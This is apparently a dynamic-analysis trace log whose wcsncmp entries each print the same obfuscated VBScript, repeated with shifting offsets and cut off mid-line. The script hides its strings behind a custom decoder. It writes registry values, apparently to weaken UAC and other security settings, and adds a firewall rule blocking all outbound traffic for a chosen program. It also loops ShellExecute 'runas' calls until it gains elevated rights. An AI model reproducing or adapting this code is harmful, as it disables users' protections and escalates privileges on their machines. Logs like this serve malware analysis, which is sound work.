bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.002] wcsncmp (_String1="ules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.002] wcsncmp (_String1="les\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.002] wcsncmp (_String1="es\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.002] wcsncmp (_String1="s\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 